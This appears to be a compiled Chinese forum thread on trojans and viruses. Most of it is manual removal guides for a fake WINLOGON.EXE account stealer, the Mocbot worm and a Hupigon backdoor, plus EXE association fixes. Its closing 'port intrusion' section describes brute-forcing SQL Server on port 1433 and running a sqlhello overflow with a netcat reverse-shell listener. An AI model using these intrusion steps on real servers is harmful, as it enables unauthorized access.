第1楼：木马病毒区整理集
第2楼： 一般的木马查杀方法
第3楼：EXE文件关联修复
第4楼：winlogon.exe病毒的查杀方法
第5楼：清除winlogon.exe病毒 与恢复EXE文件的全过程
第6楼：手动清除“魔波” 让病毒不再猖狂                                      第7楼：解决Backdoor.Win32.Hupigon.pv问题                              
第8楼：端口入侵一般知识
第9楼：冲击波整理
第10楼：防范网页木马的办法
第11楼：木马捆绑方法
第12楼：GPigeon灰鸽子2006版的手动查杀手记[转贴]               
第13楼：手工清除WINLOGON木马                                                第14楼：冲击波
第15楼：ADSL宽带内网转外网硬件设置法- -
第16楼：pagefile.pif病毒解决方案
第17楼：rose病毒的杀毒方法:
第18楼：U盘“拒绝访问”病毒的清除办法                                       第19楼：HijackThis发现灰鸽子的处理方法                                  第20楼：首页被7939.com锁定的解决方案                                    
第21楼：LSASS.EXE 中招亲历记 + 完美解决方案                        
第22楼：隐藏QQ的IP，保护隐私信息
第23楼：彻底清除病毒Trojan.DL.Agent.apb的方法
第24楼：面对病毒危机，杀毒软件就够了吗？
第25楼：浅析电脑病毒杀不掉的原因及处理方法
第26楼： sxs.exe病毒手动删除方法
第27楼：卡巴斯基莫名退出的处理办法
第28楼：Rundll32介绍和使用方法
第29楼："威金"肆虐 快下载专杀工具【自动下载病毒】            
第30缕：抓肉鸡宝典---木马传播狂抓肉鸡终级大套餐             第31楼：能上QQ但不能上网问题精解                                          
第32楼：ADSL路由方式的NAT(端口映射)专题
第33楼：带端口映射的NAT配置实例
第34楼：造成程序乱码或者下载文件乱码的解决办法
第35楼：新手必看－流光基本使用方法
第36楼：WinXP中CPU占用100%原因及解决方法
第37楼：鸽子不能上线的原因
第38楼：IP地址攻击方式
第39楼：怎样可以远程打开对方的3389端口
第40楼：重定向命令在安全方面的应用
第41楼：计算机中十二种常用密码破解方法
第42楼：打造完美的IE网页木马
第43楼：熊猫烧香病毒疯狂来袭
第44楼：国外流行防火墙横向评测
第45楼：Vista中文版傻瓜技巧
第46楼：安全知识新技术 反弹式木马
第47楼：“结束进程树”的妙用
第48楼：遇到病毒/木马等恶意程序时常要的操作[给新手]

1.)检查注册表
看HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼Curren Version和HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion下，所有以“Run”开头的键值名，其下有没有可疑的文件名。如果有，就需要删除相应的键值，再删除相应的应用程序。
2.)检查启动组
木马们如果隐藏在启动组虽然不是十分隐蔽，但这里的确是自动加载运行的好场所，因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为：C:＼windows＼start menu＼programs＼startup，在注册表中的位置：HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Explorer＼Shell
Folders Startup="C:＼windows＼start menu＼programs＼startup"。要注意经常检查这两个地方哦！
3.)Win.ini以及System.ini也是木马们喜欢的隐蔽场所，要注意这些地方
比方说，Win.ini的[Windows]小节下的load和run后面在正常情况下是没有跟什么程序的，如果有了那就要小心了，看看是什么；在System.ini的[boot]小节的Shell=Explorer.exe后面也是加载木马的好场所，因此也要注意这里了。当你看到变成这样：Shell=Explorer.exe wind0ws.exe，请注意那个wind0ws.exe很有可能就是木马服务端程序！赶快检查吧。
4.)对于下面所列文件也要勤加检查，木马们也很可能隐藏在那里
C:＼windows＼winstart.bat、C:＼windows＼wininit.ini、Autoexec.bat。
5.)如果是EXE文件启动，那么运行这个程序，看木马是否被装入内存，端口是否打开。如果是的话，则说明要么是该文件启动木马程序，要么是该文件捆绑了木马程序，只好再找一个这样的程序，重新安装一下了。
6.)万变不离其宗，木马启动都有一个方式，它只是在一个特定的情况下启动
所以，平时多注意一下你的端口，查看一下正在运行的程序，用此来监测大部分木马应该没问题的。

一定是某个软件甚至可能是病毒把扩展名为EXE的文件关联删除或修改了，因此按照前面对话框的提示从控制面板中执行“文件夹选项”命令，选择“文件类型”标签，在“已注册的文件类型”列表中找不到扩展名EXE和它的文件关联。试着按[新建]按钮，在“文件扩展名”后输入“.exe”，按[高级]按钮，系统自动将其文件类型定义为“应用程序”，按[确定]按钮后在“已注册的文件类型”列表中出现了扩展名“EXE”，选择它后按[更改]按钮，系统要求选择要使用的程序，可是到底要选择什么应用程序来打开EXE文件？看来这个方法无效，只好按[取消]按钮返回“文件夹选项”对话框。由于以前我从没听说要为扩展名为“.exe”的文件建立文件关联，所以在“已注册的文件类型”列表中选择“EXE应用程序”，并按[删除]按钮将它删除。由于所有EXE文件都不能执行，所以也无法用注册表编辑器(因为我只能运行Regedit.exe或Regedit32.exe来打开注册表编辑器)来修改注册表，看来只好重新启动计算机了。在出现“正在启动Windows…”时按[F8]键，出现“Windows 2000高级选项菜单”，选其中的“最后一次正确的配置”，进入Windows 2000时仍然报错。只好再次重新启动，这次选“安全模式”，虽然没有报错，但仍不能运行EXE文件。再试试“带命令行提示的安全模式”选项，启动成功后在命令提示符窗口的命令行输入：help | more(“|”是管道符号，在键盘上位于Backspace键左边)，在系统显示的信息第一行我看到了如下信息“ASSOC Displays or modifies file extension associations”，大致意思是“ASSOC显示或修改文件扩展名关联”。心中顿时一喜，别急，按任意键继续查看，又看到了如下信息“FTYPE Displays or modifies file types used in file extension associations.”，大意是“FTYPE显示或修改用在文件扩展名关联中的文件类型”，原来在命令提示符窗口还隐藏着这两个特殊命令，可以用来设置文件扩展名关联。于是，在命令行分别输入“help assoc”和“help ftype”两个命令获取了它们的使用方法接着通过下面的设置，终于解决了EXE文件不能运行的故障。
故障解决
先在命令行command输入：assoc .exe来显示EXE文件关联，系统显示“没有为扩展名.exe找到文件关联”，难怪EXE文件都不能执行。接着输入：ftype | more来分屏显示系统中所有的文件类型，其中有一行显示为“exefile="%1" %*”，难道只要将EXE文件与“exefile”关联，故障就会解决？于是在命令行输入：assoc .exe=exefile(assoc与.exe之间有一空格)，屏幕显示“.exe=exefile”。现在关闭命令提示符窗口，按[Ctrl+Alt+Del]组合键调出“Windows安全”窗口，按[关机]按钮后选择“重新启动”选项，按正常模式启动Windows 2000后，所有的EXE文件都能正常运行了。
几点体会
事后，重新在控制面板中执行文件夹选项命令，选择“文件类型”标签，发现在“已注册的文件类型”列表中没有EXE，也没有BAT和COM等文件类型，说明用文件夹选项命令无法创建这些类型的文件关联，我们只能在命令提示符窗口中用ASSOC和FTYPE两个命令来设置。

另外，最后一条鱼所说的利用regedit.com的方法应该是最行之有效的办法。
1、修改regedit.exe 为 regedit.com
2、HKEY_CLASSES_ROOT\exefile\shell\open\command下的default,键值为"%1" %*

这个进程是不是一个传奇世界程序的图标使用51破解版传家宝会生产一个WINLOGON.EXE进程
正常的winlogon系统进程，其用户名为“SYSTEM” 程序名为小写winlogon.exe。
而伪装成该进程的木马程序其用户名为当前系统用户名，且程序名为大写的WINLOGON.exe。
进程查看方式 ctrl+alt+del 然后选择进程。正常情况下有且只有一个winlogon.exe进程，其用户名为“SYSTEM”。如果出现了两个winlogon.exe，且其中一个为大写，用户名为当前系统用户的话，表明可能存在木马。

这个木马非常厉害，能破坏掉木马克星，使其不能正常运行。目前我使用其他杀毒软件未能查出。
那个WINDOWS下的WINLOGON.EXE确实是病毒，但是，她不过是这个病毒中的小角色而已，大家打开D盘看看是否有一个pagefile的DOS指向文件和一个autorun.inf文件了，呵呵，当然都是隐藏的，删这几个没用的，因为她关联了很多东西，甚至在安全模式都难搞，只要运行任何程序，或者双击打开D盘，她就会重新被安装了，呵呵，这段时间很多人被盗就是因为这个破解的传家宝了，而且杀毒软件查不出来，有人叫这个病毒为 ”落雪“ 是专门盗传奇传奇世界的木马，至于会不会盗其他帐号如QQ，网银 就看她高兴了，呵呵，估计也都是一并录制。不怕毒和要减少损失的最好开启防火墙阻止除了自己信任的几个常用任务出门，其他的全部阻挡，当然大家最好尽快备份，然后关门杀毒
包括方新等修改过的51pywg传家宝，和他们破解的其他一切外挂，这次嫌疑最大的是51PYWG，至于其他合作网站估计也逃不了关系，特别是方新网站，已经被证实过多次在网站放木马，虽然他解释是被黑了，但是不能排除其他可能，特别小心那些启动后连接网站的外挂，不排除启动器本身就有毒，反正一句话，这种启动就连接某网站的破解软件最容易放毒，至于什么时候放，怎么方，比如一天放几个小时，都要看他怎么爽，用也尽量用那种完全本地破解验证版的，虽然挂盟现在好像还没发现被放马或者自己放，但是千万小心，，最近传奇世界传奇N多人被盗号，目标直指这些网站，以下是最近特别毒的WINLOGON.EXE盗号病毒清除方法，注意这个假的WINLOGON.EXE是在WINDOWS下，进程里头表现为当前用户或ADMINISTRATOR.另外一个 SYSTEM的winlogon.exe是正常的，那个千万不要乱删，看清楚了，前面一个是大写，后面一个是小写，而且经部分网友证实，此文件连接目的地为河南。

解决“落雪”病毒的方法
症状：D盘双击打不开，里面有autorun.inf和pagefile.com文件
做这个病毒的人也太强了，在安全模式用Administrator一样解决不了！经过一个下午的奋战才算勉强解决。 我没用什么查杀木马的软件，全是手动一个一个把它揪出来把他删掉的。它所关联的文件如下，绝大多数文件都是显示为系统文件和隐藏的。 所以要在文件夹选项里打开显示隐藏文件。
D盘里就两个，搞得你无法双击打开D盘。C盘里盘里的就多了！
D:\autorun.inf
D:\pagefile.com
C:\Program Files\Internet Explorer\iexplore.com
C:\Program Files\Common Files\iexplore.com
C:\WINDOWS\1.com
C:\WINDOWS\iexplore.com
C:\WINDOWS\finder.com
C:\WINDOWS\Exeroud.exe（忘了是不是这个名字了，红色图标有传奇世界图标的）
C:\WINDOWS\Debug\*** Programme.exe(也是上面那个图标，名字忘了-_- 好大好明显非隐藏的)
C:\Windows\system32\command.com 这个不要轻易删，看看是不是和下面几个日期不一样而和其他文件日期一样，如果和其他文件大部分系统文件日期一样就不能删，当然系统文件肯定不是这段时间的。
C:\Windows\system32\msconfig.com
C:\Windows\system32\regedit.com
C:\Windows\system32\dxdiag.com
C:\Windows\system32\rundll32.com
C:\Windows\system32\finder.com
C:\Windows\system32\a.exe
对了，看看这些文件的日期，看看其他地方还有没有相同时间的文件还是.COM结尾的可疑文件，小心不要运行任何程序，要不就又启动了，包括双击磁盘
还有一个头号文件！WINLOGON.EXE！做了这么多工作目的就是要干掉她！！！
C:\Windows\WINLOGON.EXE
这个在进程里可以看得到，有两个，一个是真的，一个是假的。
真的是小写winlogon.exe，（不知你们的是不是），用户名是SYSTEM，
而假的是大写的WINLOGON.EXE，用户名是你自己的用户名。
这个文件在进程里是中止不了的，说是关键进程无法中止，搞得跟真的一样！就连在安全模式下它都会
呆在你的进程里！ 我现在所知道的就这些，要是不放心，就最好看一下其中一个文件的修改日期，然后用“搜索”搜这天修改过的文件，相同时间的肯定会出来一大堆的， 连系统还原夹里都有！！ 这些文件会自己关联的，要是你删了一部分，不小心运行了一个，或在开始－运行里运行msocnfig，command，regedit这些命令，所有的这些文件全会自己补充回来！
知道了这些文件，首先关闭可以关闭的所有程序，打开程序附件里头的WINDOWS资源管理器，并在上面的工具里头的文件夹选项里头的查看里设置显示所有文件和文件假，取消隐藏受保护操作系统文件，然后打开开始菜单的运行，输入命令 regedit，进注册表，到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
里面，有一个Torjan pragramme，这个明摆着“我是木马”，删！！
然后注销！ 重新进入系统后，打开“任务管理器”，看看有没rundll32，有的话先中止了，不知这个是真还是假，小心为好。 到D盘（注意不要双击进入！否则又会激活这个病毒）右键，选“打开”，把autorun.inf和pagefile.com删掉，
然后再到C盘把上面所列出来的文件都删掉！中途注意不要双击到其中一个文件，否则所有步骤都要重新来过！ 然后再注销。
我在奋战过程中，把那些文件删掉后，所有的exe文件全都打不开了，运行cmd也不行。
然后，到C:\Windows\system32 里，把cmd.exe文件复制出来，比如到桌面，改名成cmd.com 嘿嘿 我也会用com文件，然后双击这个COM文件
然后行动可以进入到DOS下的命令提示符。
再打入以下的命令：
assoc .exe=exefile （assoc与.exe之间有空格）
ftype exefile="%1" %*
这样exe文件就可以运行了。 如果不会打命令，只要打开CMD.COM后复制上面的两行分两次粘贴上去执行就可以了。
但我在弄完这些之后，在开机的进入用户时会有些慢，并会跳出一个警告框，说文件"1"找不到。（应该是Windows下的1.com文件。）,最后用上网助手之类的软件全面修复IE设置
最后说一下怎么解决开机跳出找不到文件“1.com”的方法：
在运行程序中运行“regedit”，打开注册表，在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]中
把"Shell"="Explorer.exe 1"恢复为"Shell"="Explorer.exe"

清除winlogon.exe病毒 与恢复EXE文件的全过程


我们黑基的帅哥kine,机器不知怎么中了winlogon.exe病毒，搞的就要重装系统的下场了。

那么让我们来看看这个winlogon.exe病毒 到底是什么东西的呢这么的历害的呢，

winlogon.exe病毒

这个进程是不是一个传奇世界程序的图标使用51破解版传家宝会生产一个WINLOGON.EXE进程

正常的winlogon系统进程，其用户名为“SYSTEM” 程序名为小写winlogon.exe。

而伪装成该进程的木马程序其用户名为当前系统用户名，且程序名为大写的WINLOGON.exe。

进程查看方式 ctrl+alt+del 然后选择进程。正常情况下有且只有一个winlogon.exe进程，其用户名为“SYSTEM”。如果出现了两个winlogon.exe，且其中一个为大写，用户名为当前系统用户的话，表明可能存在木马。


这个木马非常厉害，能破坏掉木马克星，使其不能正常运行。目前我使用其他杀毒软件未能查出。

那个WINDOWS下的WINLOGON.EXE确实是病毒，但是，她不过是这个病毒中的小角色而已，大家打开D盘看看是否有一个pagefile的DOS指向文件和一个autorun.inf文件了，呵呵，当然都是隐藏的，删这几个没用的，因为她关联了很多东西，甚至在安全模式都难搞，只要运行任何程序，或者双击打开D盘，她就会重新被安装了，呵呵，这段时间很多人被盗就是因为这个破解的传家宝了，而且杀毒软件查不出来，有人叫这个病毒为 ”落雪“ 是专门盗传奇传奇世界的木马，至于会不会盗其他帐号如QQ，网银 就看她高兴了，呵呵，估计也都是一并录制。不怕毒和要减少损失的最好开启防火墙阻止除了自己信任的几个常用任务出门，其他的全部阻挡，当然大家最好尽快备份，然后关门杀毒

包括方新等修改过的51pywg传家宝，和他们破解的其他一切外挂，这次嫌疑最大的是51PYWG，至于其他合作网站估计也逃不了关系，特别是方新网站，已经被证实过多次在网站放木马，虽然他解释是被黑了，但是不能排除其他可能，特别小心那些启动后连接网站的外挂，不排除启动器本身就有毒，反正一句话，这种启动就连接某网站的破解软件最容易放毒，至于什么时候放，怎么方，比如一天放几个小时，都要看他怎么爽，用也尽量用那种完全本地破解验证版的，虽然挂盟现在好像还没发现被放马或者自己放，但是千万小心，，最近传奇世界传奇N多人被盗号，目标直指这些网站，以下是最近特别毒的WINLOGON.EXE盗号病毒清除方法，注意这个假的WINLOGON.EXE是在WINDOWS下，进程里头表现为当前用户或ADMINISTRATOR.另外一个 SYSTEM的winlogon.exe是正常的，那个千万不要乱删，看清楚了，前面一个是大写，后面一个是小写，而且经部分网友证实，此文件连接目的地为河南。

知道了winlogon.exe病毒，那么我们就来看看怎么样的将它清除了吧


症状：D盘双击打不开，里面有autorun.inf和pagefile.com文件 ，在安全模式用Administrator一样解决不了！在杀毒软件全部失灵的情况下，我们只能用手工的方法将它清除，那么，下面我们来看看如何用手工的方法来清除这个可怕的东西。

它所关联的文件如下，绝大多数文件都是显示为系统文件和隐藏的。 所以要在文件夹选项里打开显示隐藏文件。

盘里就两个，搞得你无法双击打开D盘。C盘里盘里的就多了！
D:\autorun.inf
D:\pagefile.com
C:\Program Files\Internet Explorer\iexplore.com
C:\Program Files\Common Files\iexplore.com
C:\WINDOWS\1.com
C:\WINDOWS\iexplore.com
C:\WINDOWS\finder.com
C:\WINDOWS\Exeroud.exe（红色图标有传奇世界图标的）
C:\WINDOWS\Debug\*** Programme.exe(也是上面那个图标，好明显非隐藏的)
C:\Windows\system32\command.com 这个不要轻易删，看看是不是和下面几个日期不一样而和其他文件日期一样，如果和其他文件大部分系统文件日期一样就不能删，当然系统文件肯定不是这段时间的。
C:\Windows\system32\msconfig.com
C:\Windows\system32\regedit.com
C:\Windows\system32\dxdiag.com
C:\Windows\system32\rundll32.com
C:\Windows\system32\finder.com
C:\Windows\system32\a.exe

看这些文件的日期，看看其他地方还有没有相同时间的文件还是.COM结尾的可疑文件，小心不要运行任何程序，要不就又启动了，包括双击磁盘

还有一个文件！WINLOGON.EXE！做了这么多目的就是要清除了它！！！

C:\Windows\WINLOGON.EXE

这个在进程里可以看得到，有两个，一个是真的，一个是假的。

真的是小写winlogon.exe，用户名是SYSTEM， 假的是大写的WINLOGON.EXE，用户名是你自己的用户名，这个文件在进程里是中止不了的，说是关键进程无法中止，就连在安全模式下它都会，搞得跟真的一样！


最好看一下其中一个文件的修改日期，用“搜索”搜这天修改过的文件，相同时间的肯定会出来一大堆的， 连系统还原夹里都有！！ 这些文件会自己关联的，要是你删了一部分，不小心运行了一个，或在开始－运行里运行msocnfig，command，regedit这些命令，所有的这些文件全会自己补充回来！

首先关闭可以关闭的所有程序，打开程序附件里头的WINDOWS资源管理器，并在上面的工具里头的文件夹选项里头的查看里设置显示所有文件和文件夹，取消隐藏受保护操作系统文件，然后打开开始菜单的运行，输入命令 regedit，进注册表，到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

里面，有一个Torjan pragramme，删！！

后注销！ 重新进入系统后，打开“任务管理器”，看看有没rundll32，有的话先中止了，不知这个是真还是假，小心为好。 到D盘（注意不要双击进入！否则又会激活这个病毒）右键，选“打开”，把autorun.inf和pagefile.com删掉， 后再到C盘把上面所列出来的文件都删掉！中途注意不要双击到其中一个文件，否则所有步骤都要重新来过！ 然后再注销。
把那些文件删掉后，所有的exe文件全都打不开了，运行cmd也不行。

然后，到C:\Windows\system32 里，把cmd.exe文件复制出来，比如到桌面，改名成cmd.com 然后双击这个COM文件 ，然后行动可以进入到DOS下的命令提示符。

再打入以下的命令：

assoc .exe=exefile （assoc与.exe之间有空格）

ftype exefile="%1" %*

这样exe文件就可以运行了。 如果不会打命令，只要打开CMD.COM后复制上面的两行分两次粘贴上去执行就可以了。

但我在弄完这些之后，在开机的进入用户时会有些慢，并会跳出一个警告框，说文件"1"找不到。（应该是Windows下的1.com文件。）,最后用上网助手之类的软件全面修复IE设置

最后说一下怎么解决开机跳出找不到文件“1.com”的方法：

在运行程序中运行“regedit”，打开注册表，在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]中

把"Shell"="Explorer.exe 1"恢复为"Shell"="Explorer.exe"

若是还是无法执行.EXE文件，下面我们就来看看如何恢复被篡改后的.EXE文件修复工作吧。

一定是某个软件甚至可能是病毒把扩展名为EXE的文件关联删除或修改了，因此按照前面对话框的提示从控制面板中执行“文件夹选项”命令，选择“文件类型”标签，在“已注册的文件类型”列表中找不到扩展名EXE和它的文件关联。试着按[新建]按钮，在“文件扩展名”后输入“.exe”，按[高级]按钮，系统自动将其文件类型定义为“应用程序”，按[确定]按钮后在“已注册的文件类型”列表中出现了扩展名“EXE”，选择它后按[更改]按钮，系统要求选择要使用的程序，可是到底要选择什么应用程序来打开EXE文件？看来这个方法无效，只好按[取消]按钮返回“文件夹选项”对话框。由于以前我从没听说要为扩展名为“.exe”的文件建立文件关联，所以在“已注册的文件类型”列表中选择“EXE应用程序”，并按[删除]按钮将它删除。由于所有EXE文件都不能执行，所以也无法用注册表编辑器(因为我只能运行Regedit.exe或Regedit32.exe来打开注册表编辑器)来修改注册表，看来只好重新启动计算机了。在出现“正在启动Windows…”时按[F8]键，出现“Windows 2000高级选项菜单”，选其中的“最后一次正确的配置”，进入Windows 2000时仍然报错。只好再次重新启动，这次选“安全模式”，虽然没有报错，但仍不能运行EXE文件。再试试“带命令行提示的安全模式”选项，启动成功后在命令提示符窗口的命令行输入：help | more(“|”是管道符号，在键盘上位于Backspace键左边)，在系统显示的信息第一行我看到了如下信息“ASSOC Displays or modifies file extension associations”，大致意思是“ASSOC显示或修改文件扩展名关联”，按任意键继续查看，又看到了如下信息“FTYPE Displays or modifies file types used in file extension associations.”，大意是“FTYPE显示或修改用在文件扩展名关联中的文件类型”，原来在命令提示符窗口还隐藏着这两个特殊命令，可以用来设置文件扩展名关联。于是，在命令行分别输入“help assoc”和“help ftype”两个命令获取了它们的使用方法接着通过下面的设置，终于解决了EXE文件不能运行的故障。

故障解决

先在命令行command输入：assoc .exe来显示EXE文件关联，系统显示“没有为扩展名.exe找到文件关联”，难怪EXE文件都不能执行。接着输入：ftype | more来分屏显示系统中所有的文件类型，其中有一行显示为“exefile="%1" %*”，难道只要将EXE文件与“exefile”关联，故障就会解决？于是在命令行输入：assoc .exe=exefile(assoc与.exe之间有一空格)，屏幕显示“.exe=exefile”。现在关闭命令提示符窗口，按[Ctrl+Alt+Del]组合键调出“Windows安全”窗口，按[关机]按钮后选择“重新启动”选项，按正常模式启动Windows 2000后，所有的EXE文件都能正常运行了。

另外，的利用regedit.com的方法应该是最行之有效的办法。

1、修改regedit.exe 为 regedit.com

2、HKEY_CLASSES_ROOT\exefile\shell\open\command下的default,键值为"%1" %*

近些时日，利用微软MS06-040高危漏洞进行传播的恶性病毒——“魔波（Worm.Mocbot.a）

”和“魔波变种B(Worm.Mocbot.b)病毒异常泛滥，不少网友纷纷中招，

导致系统瘫痪，不能正常工作。求助网上一些杀毒工具，均不能有效清除该病毒。

  因此，我们提供最安全、最稳妥的手动清除方式来除掉“魔波”病毒，让病毒不再继续猖狂

。由于手动清除需要对操作系统比较了解，

对这方面不是很熟悉的网友还是尽量在高手的指点下进行手动清除工作。

重启进入安全模式。 1.打开注册表编辑器。点击开始>运行，输入REGEDIT，按Enter

2.在左边的面板中，双击:HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services

3.仍然在左边的面板中，找到并删除如下键：“wgareg”魔波（Worm.Mocbot.a）、“wgavm

”魔波变种B(Worm.Mocbot.b) 恢复EnableDCOM和RestrictAnonymous注册表项目 1.仍然在注册表编辑器中，在左边的面板中，双击： HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Ole

2.在右边的面板中，找到如下项目：IEnableDCOM = "N"

3.右击该项目选择修改值为： EnableDCOM = "Y"  删除关于管理共享的注册表项目 1.在注册表编辑器中，在

左边的面板中，双击：HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet> Services>lanmans

erver>parameters  2.在左边的面板中，找到并删除如下项目：

a.AutoShareWks = "dword:00000000"

b.AutoShareServer = "dword:00000000"  3.在注册表编辑器中，在左边的面板中，双击：HKEY_LOCAL_M

ACHINE>SYSTEM>CurrentControlSet> Services>lanmanworkstation>parameters  4.在左边的

面板中，找到并删除如下项目：

a.AutoShareWks = "dword:00000000"

b.AutoShareServer = "dword:00000000"  魔波（Worm.Mocbot.a，又称WORM_IRCBOT.JL）删除添加或者


修改的注册表项目 1.在注册表编辑器中，在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE&g

t;Microsoft>Security Center  2.在右边的面板中，找到项目：oFirewallDisableNotify = "dword:00000001"

oAntiVirusOverride = "dword:00000001" oAntiVirusDisableNotify = "dword:00000001" oFirewallDisableOv

erride = "dword:00000001"  3.在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE>Policies

>Microsoft>WindowsFirewall>DomainProfile  4.在右边的面板中，找到项目：EnableFirewall = "dwor

d:00000000"  5.在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE>Policies>Microsoft&

gt;WindowsFirewall>StandardProfile 魔波变种B(Worm.Mocbot.b，又称WORM_IRCBOT.JK)删除添加或者

修改的注册表项目： 1.在注册表编辑器中，在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE

>Microsoft>Security Center  2.在右边的面板中，找到并删除如下项目：:


AntiVirusDisableNotify = "dword:00000001"

AntiVirusOverride = "dword:00000001"

FirewallDisableNotify = "dword:00000001"

FirewallDisableOverride = "dword:00000001"

3.在左边的面板中，双击：HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services>Shar

edAccess  

4.在右边的面板中，找到项目： Start = "dword:00000004"

5.右击该注册表项目，选择修改项目值为：Start = "dword:00000002"  

6.在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE>Policies>Microsoft>WindowsFir

ewall>DomainProfile

7. 在右边的面板中，找到并删除如下项目：EnableFirewall = "dword:00000000"

    8. 在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE>Policies>Microsoft>WindowsFirewall>StandardProfile

    9. 在右边的面板中，找到并删除如下项目：EnableFirewall = "dword:00000000"

    10. 关闭注册表编辑器

    附加Windows ME/XP清除说明

    运行Windows ME和XP的用户必须禁用系统还原，从而可以对受感染的系统进行全面扫描。运行其他Windows版本的用户可以不需要处理上面的附加说明。

    杀毒工具推荐：使用趋势科技防病毒产品扫描系统并删除所有被检测为魔波（Worm.Mocbot.a，又称WORM_IRCBOT.JL）、魔波变种B(Worm.Mocbot.b，又称WORM_IRCBOT.JK)的文件。趋势科技的用户必须在扫描系统之前下载最新病毒码文件。

    其他的互联网用户可以使用Housecall，这是趋势科技的免费在线病毒扫描。应用补丁该病毒利用已知的漏洞，下载并安装补丁程序，请避免在相应补丁安装前使用受影响的产品。建议下载厂商发布的关键补丁。

6. 在右边的面板中，找到项目：:EnableFirewall = "dword:00000000"

    7. 在左边的面板中，双击：HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services>SharedAccess

    8. 在右边的面板中找到如下项目：:Start = "dword:00000004"

    9. 右击该项目选择修改值为： Start = "dword:00000002"

    10. 关闭注册表编辑器。

魔波变种B(Worm.Mocbot.b，又称WORM_IRCBOT.JK)删除添加或者修改的注册表项目：

    1. 在注册表编辑器中，在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Security Center

    2. 在右边的面板中，找到并删除如下项目：:
    AntiVirusDisableNotify = "dword:00000001"
    AntiVirusOverride = "dword:00000001"
    FirewallDisableNotify = "dword:00000001"
    FirewallDisableOverride = "dword:00000001"

    3. 在左边的面板中，双击：HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services>SharedAccess

    4. 在右边的面板中，找到项目： Start = "dword:00000004"

    5. 右击该注册表项目，选择修改项目值为：Start = "dword:00000002"

    6. 在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE>Policies>Microsoft>WindowsFirewall>DomainProfile

    7. 在右边的面板中，找到并删除如下项目：EnableFirewall = "dword:00000000"

    8. 在左边的面板中，双击：HKEY_LOCAL_MACHINE>SOFTWARE>Policies>Microsoft>WindowsFirewall>StandardProfile

    9. 在右边的面板中，找到并删除如下项目：EnableFirewall = "dword:00000000"

    10. 关闭注册表编辑器

    附加Windows ME/XP清除说明

    运行Windows ME和XP的用户必须禁用系统还原，从而可以对受感染的系统进行全面扫描。运行其他Windows版本的用户可以不需要处理上面的附加说明。

    杀毒工具推荐：使用趋势科技防病毒产品扫描系统并删除所有被检测为魔波（Worm.Mocbot.a，又称WORM_IRCBOT.JL）、魔波变种B(Worm.Mocbot.b，又称WORM_IRCBOT.JK)的文件。趋势科技的用户必须在扫描系统之前下载最新病毒码文件。

    其他的互联网用户可以使用Housecall，这是趋势科技的免费在线病毒扫描。应用补丁该病毒利用已知的漏洞，下载并安装补丁程序，请避免在相应补丁安装前使用受影响的产品。建议下载厂商发布的关键补丁。

病毒标签：

病毒名称：Backdoor.Win32.Hupigon.pv

病毒类型：后门

文件 MD5：33FCABD4A33E6C3A684D8AD7C3D88EE3

公开范围：完全公开

危害等级：高

文件长度：288768字节

感染系统：Win9x以上所有版本

开发工具：DELPHY

加壳类型：未知壳

命名对照：Mcafee [无]

　　　　　Symentec[无]



病毒描述：

    病毒运行初次后，先自我复制到%WINDIR%目录下重命名为LSA.exe。接着把自己添加到注册表服务项，使自己开机自启动。然后运行LSA.exe。LSA.exe启动以后会与IP：202.194.240.114的80端口进行连接，同时打开本地1032端口等待被连接。该后门能完全的控制服务端主机，包括截图、上传、下载文件、运行指定的程序、修改注册表、修改服务、等等……。

行为分析：

1、自我复制到%WINDIR%目录下重命名为LSA.exe。

2、把自己添加到注册表服务项：

　　HKEY_LOCAL_MACHINESYSTEMControlSet001Services

　　添加服务项：LSA

为了达到伪装的目的，该服务的描述被特别改成为：

“用于协助系统底层程序的运行。如果此服务被禁止则一些应用于系统底层的程序将无法正常工作。”

3、与IP：202.194.240.114的80端口进行连接，同时打开本地80端口等待被连接。

4、 pv 变种的隐藏方式为线程注入到“IEXPLORE.EXE”和隐藏注入的目标进程“IEXPLORE.EXE”。

5、 该后门能完全的控制服务端主机，包括截图、上传、下载文件、运行指定的程序、修改注册表、修改服务、等等……。



注：% System%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32，windows95/98/me中默认的安装路径是C:WindowsSystem，windowsXP中默认的安装路径是C:WindowsSystem32。  

清除方案：

1、使用木马防线2005 v4.6.5可彻底清除此病毒(推荐)。

2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

(1) 删除注册表病毒相关键值：
　　 　HKEY_LOCAL_MACHINESYSTEMControlSet001Services
　　　 删除项名：LSA　　

(2)删除病毒释放的文件：
　　 　%WINDIR%LSA.exe 　　

附：
木马防线2005 v4.6.5下载地址:
http://www.pcav.cn/Soft/mmxg/mm/200608/578.html

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键）最后 SQLTool*.**e入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功） sqlhelloz.exe 入侵ip 1433 （这个是正向连接）
2. 4899端口入侵用4899过滤器.exe，扫描空口令的机器
